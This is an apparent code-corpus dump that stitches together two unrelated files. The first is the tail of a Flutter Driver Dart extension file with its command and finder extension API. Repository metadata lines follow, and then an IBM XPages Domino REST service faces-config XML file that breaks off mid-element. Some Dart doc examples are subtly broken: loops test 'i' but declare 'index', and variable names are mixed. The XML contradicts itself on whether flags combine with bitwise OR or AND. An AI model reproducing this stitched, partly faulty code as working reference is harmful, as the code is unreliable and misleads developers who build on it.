{ /// Some someFinder = finder as SomeFinder; /// /// return find.byElementPredicate((Element element) { /// final Widget widget = element.widget; /// if (element.widget is SomeWidget) { /// return element.widget.title == someFinder.title; /// } /// return false; /// }); /// } /// } /// ``` /// /// Note: SomeCommand, SomeResult and SomeCommandExtension must be placed in /// different files to avoid `dart:ui` import issue. Imports relative to `dart:ui` /// can't be accessed from host runner, where flutter runtime is not accessible. /// /// ```dart /// class SomeCommand extends CommandWithTarget { /// SomeCommand(SerializableFinder finder, this.times, {Duration? timeout}) /// : super(finder, timeout: timeout); /// /// SomeCommand.deserialize(Map<String, String> json, DeserializeFinderFactory finderFactory) /// : times = int.parse(json['times']!), /// super.deserialize(json, finderFactory); /// /// @override /// Map<String, String> serialize() { /// return super.serialize()..addAll(<String, String>{'times': '$times'}); /// } /// /// @override /// String get kind => 'SomeCommand'; /// /// final int times; /// } /// ``` /// /// ```dart /// class SomeCommandResult extends Result { /// const SomeCommandResult(this.resultParam); /// /// final String resultParam; /// /// @override /// Map<String, dynamic> toJson() { /// return <String, dynamic>{ /// 'resultParam': resultParam, /// }; /// } /// } /// ``` /// /// ```dart /// class SomeCommandExtension extends CommandExtension { /// @override /// String get commandKind => 'SomeCommand'; /// /// @override /// Future<Result> call(Command command, WidgetController prober, CreateFinderFactory finderFactory, CommandHandlerFactory handlerFactory) async { /// final SomeCommand someCommand = command as SomeCommand; /// /// // Deserialize [Finder]: /// final Finder finder = finderFactory.createFinder(stubCommand.finder); /// /// // Wait for [Element]: /// handlerFactory.waitForElement(finder); /// /// // Alternatively, wait for [Element] absence: /// handlerFactory.waitForAbsentElement(finder); /// /// // Submit known [Command]s: /// for (int index = 0; i < someCommand.times; index++) { /// await handlerFactory.handleCommand(Tap(someCommand.finder), prober, finderFactory); /// } /// /// // Alternatively, use [WidgetController]: /// for (int index = 0; i < stubCommand.times; index++) { /// await prober.tap(finder); /// } /// /// return const SomeCommandResult('foo bar'); /// } /// /// @override /// Command deserialize(Map<String, String> params, DeserializeFinderFactory finderFactory, DeserializeCommandFactory commandFactory) { /// return SomeCommand.deserialize(params, finderFactory); /// } /// } /// ``` /// void enableFlutterDriverExtension({ DataHandler? handler, bool silenceErrors = false, bool enableTextEntryEmulation = true, List<FinderExtension>? finders, List<CommandExtension>? commands}) { assert(WidgetsBinding.instance == null); _DriverBinding(handler, silenceErrors, enableTextEntryEmulation, finders ?? <FinderExtension>[], commands ?? <CommandExtension>[]); assert(WidgetsBinding.instance is _DriverBinding); } /// Signature for functions that handle a command and return a result. typedef CommandHandlerCallback = Future<Result?> Function(Command c); /// Signature for functions that deserialize a JSON map to a command object. typedef CommandDeserializerCallback = Command Function(Map<String, String> params); /// Used to expand the new [Finder]. abstract class FinderExtension { /// Identifies the type of finder to be used by the driver extension. String get finderType; /// Deserializes the finder from JSON generated by [SerializableFinder.serialize]. /// /// Use [finderFactory] to deserialize nested [Finder]s. /// /// See also: /// * [Ancestor], a finder that uses other [Finder]s as parameters. SerializableFinder deserialize(Map<String, String> params, DeserializeFinderFactory finderFactory); /// Signature for functions that run the given finder and return the [Element] /// found, if any, or null otherwise. /// /// Call [finderFactory] to create known, nested [Finder]s from [SerializableFinder]s. Finder createFinder(SerializableFinder finder, CreateFinderFactory finderFactory); } /// Used to expand the new [Command]. /// /// See also: /// * [CommandWithTarget], a base class for [Command]s with [Finder]s. abstract class CommandExtension { /// Identifies the type of command to be used by the driver extension. String get commandKind; /// Deserializes the command from JSON generated by [Command.serialize]. /// /// Use [finderFactory] to deserialize nested [Finder]s. /// Usually used for [CommandWithTarget]s. /// /// Call [commandFactory] to deserialize commands specified as parameters. /// /// See also: /// * [CommandWithTarget], a base class for commands with target finders. /// * [Tap], a command that uses [Finder]s as parameter. Command deserialize(Map<String, String> params, DeserializeFinderFactory finderFactory, DeserializeCommandFactory commandFactory); /// Calls action for given [command]. /// Returns action [Result]. /// Invoke [prober] functions to perform widget actions. /// Use [finderFactory] to create [Finder]s from [SerializableFinder]. /// Call [handlerFactory] to invoke other [Command]s or [CommandWithTarget]s. /// /// The following example shows invoking nested command with [handlerFactory]. /// /// ```dart /// @override /// Future<Result> call(Command command, WidgetController prober, CreateFinderFactory finderFactory, CommandHandlerFactory handlerFactory) async { /// final StubNestedCommand stubCommand = command as StubNestedCommand; /// for (int index = 0; i < stubCommand.times; index++) { /// await handlerFactory.handleCommand(Tap(stubCommand.finder), prober, finderFactory); /// } /// return const StubCommandResult('stub response'); /// } /// ``` /// /// Check the example below for direct [WidgetController] usage with [prober]: /// /// ```dart /// @override /// Future<Result> call(Command command, WidgetController prober, CreateFinderFactory finderFactory, CommandHandlerFactory handlerFactory) async { /// final StubProberCommand stubCommand = command as StubProberCommand; /// for (int index = 0; i < stubCommand.times; index++) { /// await prober.tap(finderFactory.createFinder(stubCommand.finder)); /// } /// return const StubCommandResult('stub response'); /// } /// ``` Future<Result> call(Command command, WidgetController prober, CreateFinderFactory finderFactory, CommandHandlerFactory handlerFactory); } /// The class that manages communication between a Flutter Driver test and the /// application being remote-controlled, on the application side. /// /// This is not normally used directly. It is instantiated automatically when /// calling [enableFlutterDriverExtension]. @visibleForTesting class FlutterDriverExtension with DeserializeFinderFactory, CreateFinderFactory, DeserializeCommandFactory, CommandHandlerFactory { /// Creates an object to manage a Flutter Driver connection. FlutterDriverExtension( this._requestDataHandler, this._silenceErrors, this._enableTextEntryEmulation, { List<FinderExtension> finders = const <FinderExtension>[], List<CommandExtension> commands = const <CommandExtension>[], }) : assert(finders != null) { if (_enableTextEntryEmulation) { registerTextInput(); } for (final FinderExtension finder in finders) { _finderExtensions[finder.finderType] = finder; } for (final CommandExtension command in commands) { _commandExtensions[command.commandKind] = command; } } final WidgetController _prober = LiveWidgetController(WidgetsBinding.instance!); final DataHandler? _requestDataHandler; final bool _silenceErrors; final bool _enableTextEntryEmulation; void _log(String message) { driverLog('FlutterDriverExtension', message); } final Map<String, FinderExtension> _finderExtensions = <String, FinderExtension>{}; final Map<String, CommandExtension> _commandExtensions = <String, CommandExtension>{}; /// Processes a driver command configured by [params] and returns a result /// as an arbitrary JSON object. /// /// [params] must contain key "command" whose value is a string that /// identifies the kind of the command and its corresponding /// [CommandDeserializerCallback]. Other keys and values are specific to the /// concrete implementation of [Command] and [CommandDeserializerCallback]. /// /// The returned JSON is command specific. Generally the caller deserializes /// the result into a subclass of [Result], but that's not strictly required. @visibleForTesting Future<Map<String, dynamic>> call(Map<String, String> params) async { final String commandKind = params['command']!; try { final Command command = deserializeCommand(params, this); assert(WidgetsBinding.instance!.isRootWidgetAttached || !command.requiresRootWidgetAttached, 'No root widget is attached; have you remembered to call runApp()?'); Future<Result?> responseFuture = handleCommand(command, _prober, this); if (command.timeout != null) responseFuture = responseFuture.timeout(command.timeout ?? Duration.zero); final Result? response = await responseFuture; return _makeResponse(response?.toJson()); } on TimeoutException catch (error, stackTrace) { final String message = 'Timeout while executing $commandKind: $error\n$stackTrace'; _log(message); return _makeResponse(message, isError: true); } catch (error, stackTrace) { final String message = 'Uncaught extension error while executing $commandKind: $error\n$stackTrace'; if (!_silenceErrors) _log(message); return _makeResponse(message, isError: true); } } Map<String, dynamic> _makeResponse(dynamic response, { bool isError = false }) { return <String, dynamic>{ 'isError': isError, 'response': response, }; } @override SerializableFinder deserializeFinder(Map<String, String> json) { final String? finderType = json['finderType']; if (_finderExtensions.containsKey(finderType)) { return _finderExtensions[finderType]!.deserialize(json, this); } return super.deserializeFinder(json); } @override Finder createFinder(SerializableFinder finder) { final String finderType = finder.finderType; if (_finderExtensions.containsKey(finderType)) { return _finderExtensions[finderType]!.createFinder(finder, this); } return super.createFinder(finder); } @override Command deserializeCommand(Map<String, String> params, DeserializeFinderFactory finderFactory) { final String? kind = params['command']; if (_commandExtensions.containsKey(kind)) { return _commandExtensions[kind]!.deserialize(params, finderFactory, this); } return super.deserializeCommand(params, finderFactory); } @override @protected DataHandler? getDataHandler() { return _requestDataHandler; } @override Future<Result> handleCommand(Command command, WidgetController prober, CreateFinderFactory finderFactory) { final String kind = command.kind; if (_commandExtensions.containsKey(kind)) { return _commandExtensions[kind]!.call(command, prober, finderFactory, this); } return super.handleCommand(command, prober, finderFactory); } }
Dart
5
Mayb3Nots/flutter
packages/flutter_driver/lib/src/extension/extension.dart
[ "BSD-3-Clause" ]
<?xml version="1.0" encoding="UTF-8"?> <!-- ******************************************************************* --> <!-- --> <!-- © Copyright IBM Corp. 2010, 2012 --> <!-- --> <!-- Licensed under the Apache License, Version 2.0 (the "License"); --> <!-- you may not use this file except in compliance with the License. --> <!-- You may obtain a copy of the License at: --> <!-- --> <!-- http://www.apache.org/licenses/LICENSE-2.0 --> <!-- --> <!-- Unless required by applicable law or agreed to in writing, software --> <!-- distributed under the License is distributed on an "AS IS" BASIS, --> <!-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or --> <!-- implied. See the License for the specific language governing --> <!-- permissions and limitations under the License. --> <!-- --> <!-- ******************************************************************* --> <faces-config> <faces-config-extension> <namespace-uri>http://www.ibm.com/xsp/coreex</namespace-uri> <default-prefix>xe</default-prefix> <designer-extension> <control-subpackage-name>rest</control-subpackage-name> </designer-extension> </faces-config-extension> <complex-type> <description>Base class for all the Domino based services</description> <display-name>Abstract Domino Service</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoService</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoService</complex-class> <!-- TODO check that server!!dbname works --> <group-type-ref>com.ibm.xsp.extlib.group.databaseNameProp</group-type-ref> <complex-extension> <base-complex-id>com.ibm.xsp.extlib.component.rest.AbstractRestService</base-complex-id> <designer-extension> <tags> todo </tags> </designer-extension> </complex-extension> </complex-type> <complex-type> <description>Abstract Domino View service implementation</description> <display-name>Abstract Domino View Service</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoViewService</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoViewService</complex-class> <group-type-ref>com.ibm.xsp.extlib.group.viewFolderNameProp</group-type-ref> <property> <description>Request scope variable name through which a view row will be made available</description> <display-name>Var</display-name> <property-name>var</property-name> <property-class>java.lang.String</property-class> <property-extension> <allow-run-time-binding>false</allow-run-time-binding> <designer-extension> <editor>com.ibm.xsp.extlib.designer.tooling.editor.VarNameEditor</editor> </designer-extension> </property-extension> </property> <property> <!-- # The constant names should not be translated: Entries 0x0001, Top Level 0x0002, Timestamp 0x0004. --> <description>Specifies the combination of global values returned by the service. Multiple global value constants can be combined using the bitwise OR operator (|). The global constants are: Entries 0x0001, Top Level 0x0002, Timestamp 0x0004.</description> <display-name>Global Values</display-name> <property-name>globalValues</property-name> <property-class>int</property-class> <property-extension> <designer-extension> <editor>com.ibm.xsp.extlib.designer.tooling.editor.BitwiseFlagsEditor</editor> <editor-parameter> 0x0001:Entries 0x0002:Top Level 0x0004:Timestamp </editor-parameter> </designer-extension> </property-extension> </property> <property> <!-- # The system column names should not be translated: NoteID 0x0001, UNID 0x0002, Position 0x0004, Read 0x0008, Siblings 0x0010, Descendants 0x0020, Children 0x0040, Indent 0x0080, Form 0x0100, Category 0x0200, Response 0x0400 --> <description>Specifies which system columns should be returned by the service. Multiple system columns can be combined using the bitwise OR operator (|). The system columns are, NoteID 0x0001, UNID 0x0002, Position 0x0004, Read 0x0008, Siblings 0x0010, Descendants 0x0020, Children 0x0040, Indent 0x0080, Form 0x0100, Category 0x0200, Response 0x0400.</description> <display-name>System Columns</display-name> <property-name>systemColumns</property-name> <property-class>int</property-class> <property-extension> <designer-extension> <editor>com.ibm.xsp.extlib.designer.tooling.editor.BitwiseFlagsEditor</editor> <editor-parameter> 0x0001:NoteID 0x0002:UNID 0x0004:Position 0x0008:Read 0x0010:Siblings 0x0020:Descendants 0x0040:Children 0x0080:Indent 0x0100:Form 0x0200:Category 0x0400:Response </editor-parameter> </designer-extension> </property-extension> </property> <property> <description>Specifies whether all the view columns should be automatically returned by the service. Default is "false".</description> <display-name>Default Columns</display-name> <property-name>defaultColumns</property-name> <property-class>boolean</property-class> </property> <property> <description>The list of view columns that should be returned by the service</description> <display-name>Columns</display-name> <property-name>columns</property-name> <property-class>java.util.List</property-class> <property-extension> <allow-run-time-binding>false</allow-run-time-binding> <collection-property>true</collection-property> <property-item-class>com.ibm.xsp.extlib.component.rest.DominoViewColumn</property-item-class> <property-add-method>addColumn</property-add-method> </property-extension> </property> <property> <description>Specifies the start index for the first row that should be returned by the service</description> <display-name>Start Index</display-name> <property-name>start</property-name> <property-class>int</property-class> </property> <property> <description>Specifies the number of rows that should be returned by the service</description> <display-name>Row Count</display-name> <property-name>count</property-name> <property-class>int</property-class> </property> <!-- TODO MWD is this the sort or resort feature --> <property> <description>A column that can be used to sort the view data</description> <display-name>Sort Column</display-name> <property-name>sortColumn</property-name> <property-class>java.lang.String</property-class> <property-extension> <designer-extension> <tags> todo </tags> </designer-extension> </property-extension> </property> <!-- TODO MWD is this the sort or resort feature? May need a third option "toggle" if it is a dynamic resort --> <property> <description>The order by which you wish to collate the sort column</description> <display-name>Sort Order</display-name> <property-name>sortOrder</property-name> <property-class>java.lang.String</property-class> <property-extension> <designer-extension> <editor>com.ibm.workplace.designer.property.editors.comboParameterEditor</editor> <editor-parameter> descending ascending </editor-parameter> <tags> todo </tags> </designer-extension> </property-extension> </property> <property> <description>%/com.ibm.xsp.model.domino.dominoView/expandLevel/descr%</description> <display-name>%/com.ibm.xsp.model.domino.dominoView/expandLevel/name%</display-name> <property-name>expandLevel</property-name> <property-class>int</property-class> </property> <property> <description>%/com.ibm.xsp.model.domino.dominoView/parentId/descr%</description> <display-name>%/com.ibm.xsp.model.domino.dominoView/parentId/name%</display-name> <property-name>parentId</property-name> <property-class>java.lang.String</property-class> <property-extension> <designer-extension> <!-- This is not a control reference, it is a reference to a document ID --> <tags> not-control-id-reference </tags> </designer-extension> </property-extension> </property> <property> <description>%/com.ibm.xsp.model.domino.dominoView/categoryFilter/descr%</description> <display-name>%/com.ibm.xsp.model.domino.dominoView/categoryFilter/name%</display-name> <property-name>categoryFilter</property-name> <property-class>java.lang.String</property-class> </property> <property> <description>%/com.ibm.xsp.model.domino.dominoView/startKeys/descr%</description> <display-name>%/com.ibm.xsp.model.domino.dominoView/startKeys/name%</display-name> <property-name>startKeys</property-name> <property-class>java.lang.Object</property-class> </property> <property> <description>%/com.ibm.xsp.model.domino.dominoView/keys/descr%</description> <display-name>%/com.ibm.xsp.model.domino.dominoView/keys/name%</display-name> <property-name>keys</property-name> <property-class>java.lang.Object</property-class> </property> <property> <description>%/com.ibm.xsp.model.domino.dominoView/keysExactMatch/descr%</description> <display-name>%/com.ibm.xsp.model.domino.dominoView/keysExactMatch/name%</display-name> <property-name>keysExactMatch</property-name> <property-class>boolean</property-class> </property> <!-- TODO !!! Add new FTSearch filters to enable sortable results for 8.5.3. !!! --> <property> <description>%/com.ibm.xsp.model.domino.dominoView/search/descr%</description> <display-name>%/com.ibm.xsp.model.domino.dominoView/search/name%</display-name> <property-name>search</property-name> <property-class>java.lang.String</property-class> <property-extension> <localizable>true</localizable> <designer-extension> <tags>todo</tags> </designer-extension> </property-extension> </property> <property> <description>%/com.ibm.xsp.model.domino.dominoView/searchMaxDocs/descr%</description> <display-name>%/com.ibm.xsp.model.domino.dominoView/searchMaxDocs/name%</display-name> <property-name>searchMaxDocs</property-name> <property-class>int</property-class> </property> <property> <description>Form used when creating new documents</description> <display-name>Form Name</display-name> <property-name>formName</property-name> <property-class>java.lang.String</property-class> <property-extension> <designer-extension> <editor>com.ibm.xsp.extlib.designer.tooling.editor.FormNameEditor</editor> </designer-extension> </property-extension> </property> <property> <description>Validates documents by executing the default value, translation, and validation formulas defined in the underlying form</description> <display-name>Compute With Form</display-name> <property-name>computeWithForm</property-name> <property-class>boolean</property-class> <property-extension> <designer-extension> <tags>todo</tags> <!-- TODO this is a boolean, but the one in the XPages runtime is a String with options: onload onsave both --> </designer-extension> </property-extension> </property> <!-- TODO Are these doc events valid on a View REST service - what is the use case ??? --> <!-- TODO If valid, these do not show in Events tab ... applies to all remaining props --> <property> <description>Triggered before creating a new document</description> <display-name>Query New Document Method Binding</display-name> <property-name>queryNewDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> <designer-extension> <tags>todo</tags> </designer-extension> </property-extension> </property> <property> <description>Triggered before opening the document</description> <display-name>Query Open Document Method Binding</display-name> <property-name>queryOpenDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <property> <description>Triggered before saving the document</description> <display-name>Query Save Document Method Binding</display-name> <property-name>querySaveDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <property> <description>Triggered before deleting the document</description> <display-name>Query Delete Document Method Binding</display-name> <property-name>queryDeleteDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <property> <description>Triggered after creating the document</description> <display-name>Post New Document Method Binding</display-name> <property-name>postNewDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <property> <description>Triggered after opening the document</description> <display-name>Post Open Document Method Binding</display-name> <property-name>postOpenDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <property> <description>Triggered after saving the document</description> <display-name>Post Save Document Method Binding</display-name> <property-name>postSaveDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <property> <description>Triggered after deleting the document</description> <display-name>Post Delete Document Method Binding</display-name> <property-name>postDeleteDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <complex-extension> <base-complex-id>com.ibm.xsp.extlib.component.rest.DominoService</base-complex-id> </complex-extension> </complex-type> <complex-type> <description>A column in a Domino view service, indicating an underlying column in a Domino view to be returned by the service. The Domino view services can also handle Domino folders, which are similar to views, so this may be used as a column in a folder.</description> <display-name>Domino View or Folder Column</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoViewColumn</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoViewColumn</complex-class> <!-- TODO better description - localizable ???? --> <property> <description>A field name used to describe the column data or value. This will be referenced by the display control to retrieve the field values.</description> <display-name>Name</display-name> <property-name>name</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>true</required> <!-- Note, this is not a localizable text. It is declaring a field-name that will be referenced from the xe:djxDataGridColumn field property. If you wish to provide localizable text as the column header, use the xe:djxDataGridColumn label property. --> </property-extension> </property> <property> <description>The name of the column in the Domino view or folder. It can be the programmatic name or title.</description> <display-name>Column Name</display-name> <property-name>columnName</property-name> <property-class>java.lang.String</property-class> </property> <property> <!-- # "columnName" should not be translated. --> <description>Value to be displayed instead of the column data. This is only used when the "columnName" property is absent.</description> <display-name>Value</display-name> <property-name>value</property-name> <property-class>java.lang.Object</property-class> <property-extension> <localizable>true</localizable> <designer-extension> <tags> localizable-text </tags> </designer-extension> </property-extension> </property> <complex-extension> <tag-name>restViewColumn</tag-name> <designer-extension> <tags> todo </tags> </designer-extension> </complex-extension> </complex-type> <!-- TODO conflicting descriptions/display names due to copy/paste? NORMALIZE names --> <complex-type> <!-- TODO update spellcheck test to complain for non-uppercase JSON occurences --> <!-- TODO better description --> <description>Domino JSON legacy view service implementation, emulating the older JSON service from iNotes</description> <display-name>Domino View as Legacy JSON</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoViewJsonLegacyService</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoViewJsonLegacyService</complex-class> <group-type-ref>com.ibm.xsp.extlib.rest.json.options</group-type-ref> <complex-extension> <tag-name>viewJsonLegacyService</tag-name> <base-complex-id>com.ibm.xsp.extlib.component.rest.DominoViewService</base-complex-id> <designer-extension> <tags> todo </tags> </designer-extension> </complex-extension> </complex-type> <complex-type> <!-- TODO better description : this one is not comprehensible --> <description>Domino JSON item file view service implementation</description> <display-name>Domino View as JSON Item File</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoViewItemFileService</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoViewItemFileService</complex-class> <group-type-ref>com.ibm.xsp.extlib.rest.json.options</group-type-ref> <complex-extension> <tag-name>viewItemFileService</tag-name> <base-complex-id>com.ibm.xsp.extlib.component.rest.DominoViewService</base-complex-id> <designer-extension> <tags> todo </tags> </designer-extension> </complex-extension> </complex-type> <complex-type> <description>Domino JSON view service implementation</description> <display-name>Domino View as Standard JSON</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoViewJsonService</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoViewJsonService</complex-class> <group-type-ref>com.ibm.xsp.extlib.rest.json.options</group-type-ref> <complex-extension> <tag-name>viewJsonService</tag-name> <base-complex-id>com.ibm.xsp.extlib.component.rest.DominoViewService</base-complex-id> </complex-extension> </complex-type> <complex-type> <description>Domino XML standard view service implementation, emulating the older XML service from iNotes</description> <display-name>Domino View as Legacy XML</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoViewXmlLegacyService</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoViewXmlLegacyService</complex-class> <group-type-ref>com.ibm.xsp.extlib.rest.xml.options</group-type-ref> <complex-extension> <tag-name>viewXmlLegacyService</tag-name> <base-complex-id>com.ibm.xsp.extlib.component.rest.DominoViewService</base-complex-id> </complex-extension> </complex-type> <!-- TODO "legacy" usage : minimize where possible --> <complex-type> <description>Domino Calendar JSON legacy view service implementation, emulating the older JSON service from iNotes</description> <display-name>Domino Calendar Entries as Legacy JSON</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoCalendarJsonLegacyService</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoCalendarJsonLegacyService</complex-class> <group-type-ref>com.ibm.xsp.extlib.group.viewNameProp</group-type-ref> <group-type-ref>com.ibm.xsp.extlib.rest.json.options</group-type-ref> <property> <description>Request scope variable name through which a view row will be made available</description> <display-name>Var</display-name> <property-name>var</property-name> <property-class>java.lang.String</property-class> <property-extension> <allow-run-time-binding>false</allow-run-time-binding> <designer-extension> <editor>com.ibm.xsp.extlib.designer.tooling.editor.VarNameEditor</editor> </designer-extension> </property-extension> </property> <!-- TODO check out error handling for invalid or bad backend Domino calendar views --> <!-- TODO test with different timezones e.g. USA and Ireland (server && browser)--> <!-- TODO Date formatting for Swedish: xpages uses ICU, rather than Java native date formats because the Swedish government changed the swedish date formats, and Java is still using the old format When we use the wrong format, the swedish translators complain and log bugs. The code that's doing the date formatting may be in the REST Services codebase. --> <property> <!--# Do not translate the quoted $number: e.g. "$123" --> <description>The name of the column in the calendar view that contains the date of the calendar entries. Default column name is "$134".</description> <display-name>Calendar Date Column</display-name> <property-name>colCalendarDate</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>false</required> <designer-extension> <!-- see the comments before this property --> <tags> todo </tags> </designer-extension> </property-extension> </property> <property> <!--# Do not translate the quoted $number: e.g. "$123" --> <description>The name of the column in the calendar view that contains the start time of the calendar entries. Default column name is "$144".</description> <display-name>Start Time Column</display-name> <property-name>colStartTime</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>false</required> </property-extension> </property> <property> <!--# Do not translate the quoted $number: e.g. "$123" --> <description>The name of the column in the calendar view that contains the end time of the calendar entries. Default column name is "$146".</description> <display-name>End Time Column</display-name> <property-name>colEndTime</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>false</required> </property-extension> </property> <property> <!--# Do not translate the quoted $number: e.g. "$123" --> <description>The name of the column in the calendar view that contains the subject field for the calendar entries. Default column name is "$147".</description> <display-name>Subject Column</display-name> <property-name>colSubject</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>false</required> </property-extension> </property> <property> <!--# Do not translate the quoted $number: e.g. "$123" --> <description>The name of the column in the calendar view that contains the alternative subject field, if any, for the calendar entries. Default column name is "$151".</description> <display-name>Alternative Subject Column</display-name> <property-name>colAltSubject</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>false</required> <designer-extension> <!-- not localizable because it is a column name, not displayed text.--> <tags> not-localizable </tags> </designer-extension> </property-extension> </property> <property> <!--# Do not translate the quoted $number: e.g. "$123" --> <description>The name of the column in the calendar view that contains the calendar entry icon. The iNotes calendar has icons depicting the entry type (e.g. meeting, anniversary etc) or entry status (e.g. accepted). An integer icon ID is returned by the service. Default column name is "$149".</description> <display-name>Entry Icon Column</display-name> <property-name>colEntryIcon</property-name> <property-class>java.lang.String</property-class> <property-extension> <designer-extension> <!-- This is the name of a column containing an icon path, not the icon path itself. so the tag not-image-path prevents a fail in ImageEditorTest --> <tags> not-image-path </tags> </designer-extension> </property-extension> </property> <property> <!--# Do not translate the quoted $number: e.g. "$123" --> <description>The name of the column in the calendar view that contains the event type for the calendar entries. An integer entry ID is returned by the service, where 0 = appointment, 1 = anniversary, 2 = all day event, 3 = meeting etc. Default column name is "$152".</description> <display-name>Entry Type Column</display-name> <property-name>colEntryType</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>false</required> </property-extension> </property> <property> <!--# Do not translate the quoted $number: e.g. "$123" --> <description>The name of the column in the calendar view that contains the identity of the person responsible for the calendar entry, e.g. the name of a person who sent a meeting invitation. Default column name is "$153".</description> <display-name>Chairperson Column</display-name> <property-name>colChair</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>false</required> </property-extension> </property> <property> <!--# Do not translate the quoted $number: e.g. "$123" --> <description>The name of the column in the calendar view that contains the confidential status of the calendar entry. An integer entry ID is returned by the service, where 0 = non-confidential, 1 = confidential. Default column name is "$154".</description> <display-name>Confidential Column</display-name> <property-name>colConfidential</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>false</required> </property-extension> </property> <property> <!--# Do not translate the quoted $number: e.g. "$123". Do not translate quoted words: "Accepted", "Tentatively Accepted", "Draft", "Countered"--> <description>The name of the column in the calendar view that contains the status of the calendar entry. Status values are returned by the service, e.g. "Accepted", "Tentatively Accepted", "Draft", "Countered". Default column name is "$160".</description> <display-name>Status Column</display-name> <property-name>colStatus</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>false</required> </property-extension> </property> <property> <!--# Do not translate the quoted $word: e.g. "$UserData" --> <description>The name of the column in the calendar view that contains custom data. In the standard Notes calendar, the custom data column contains whatever is found in a $UserData item in the calendar entry. Default column name is "$UserData".</description> <display-name>Custom Data Column</display-name> <property-name>colCustomData</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>false</required> </property-extension> </property> <complex-extension> <tag-name>calendarJsonLegacyService</tag-name> <base-complex-id>com.ibm.xsp.extlib.component.rest.DominoService</base-complex-id> <designer-extension> <tags> todo </tags> </designer-extension> </complex-extension> </complex-type> <complex-type> <description>Abstract Domino Document service implementation</description> <display-name>Abstract Domino Document Service</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoDocumentService</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoDocumentService</complex-class> <property> <description>Request scope variable name through which a document row will be made available</description> <display-name>Var</display-name> <property-name>var</property-name> <property-class>java.lang.String</property-class> <property-extension> <allow-run-time-binding>false</allow-run-time-binding> <designer-extension> <editor>com.ibm.xsp.extlib.designer.tooling.editor.VarNameEditor</editor> </designer-extension> </property-extension> </property> <property> <!-- TODO expand description --> <description>Domino Document UNID</description> <display-name>Document UNID</display-name> <property-name>documentUnid</property-name> <property-class>java.lang.String</property-class> <property-extension> <required>false</required> <designer-extension> <tags> todo </tags> </designer-extension> </property-extension> </property> <property> <!-- # The constant names should not be translated: 1 - Entries, 2 - Top Level, 4 - Timestamp --> <description>Specifies the global values returned by the service. This may specify multiple global value constants, combined using the bitwise AND operator (&amp;). The global value constants are: 1 - Entries, 2 - Top Level, 4 - Timestamp.</description> <display-name>Global Values</display-name> <property-name>globalValues</property-name> <property-class>int</property-class> <property-extension> <designer-extension> <editor>com.ibm.xsp.extlib.designer.tooling.editor.BitwiseFlagsEditor</editor> <editor-parameter> 0x0001:Entries 0x0002:Top Level 0x0004:Timestamp </editor-parameter> </designer-extension> </property-extension> </property> <property> <!-- # The system item names should not be translated: NoteID 0x0001, UNID 0x0002, ParentID 0x0004, Created 0x0008, Modified 0x0010, Authors 0x0020 --> <description>Specifies whether some system items should be added. This may specify multiple system items, combined using the bitwise AND operator (&amp;). The system items are, NoteID 0x0001, UNID 0x0002, ParentID 0x0004, Created 0x0008, Modified 0x0010, Authors 0x0020.</description> <display-name>System Items</display-name> <property-name>systemItems</property-name> <property-class>int</property-class> <property-extension> <designer-extension> <editor>com.ibm.xsp.extlib.designer.tooling.editor.BitwiseFlagsEditor</editor> <editor-parameter> 0x0001:NoteID 0x0002:UNID 0x0004:ParentID 0x0008:Created 0x0010:Modified 0x0020:Authors </editor-parameter> </designer-extension> </property-extension> </property> <property> <description>Specifies whether the default document items should be automatically added</description> <display-name>Default Items (Fields)</display-name> <property-name>defaultItems</property-name> <property-class>boolean</property-class> </property> <!-- TODO mention response doc implication for parentId and should not find both together at the same time --> <property> <description>ID of the parent Domino document</description> <display-name>Parent ID</display-name> <property-name>parentId</property-name> <property-class>java.lang.String</property-class> <property-extension> <designer-extension> <!-- This is not a control reference, it is a reference to a document ID --> <tags> todo not-control-id-reference </tags> </designer-extension> </property-extension> </property> <!-- TODO update desc - not necessarily new --> <!-- TODO databasename missing : why ? --> <property> <description>Form used when creating new documents</description> <display-name>Form Name</display-name> <property-name>formName</property-name> <property-class>java.lang.String</property-class> <property-extension> 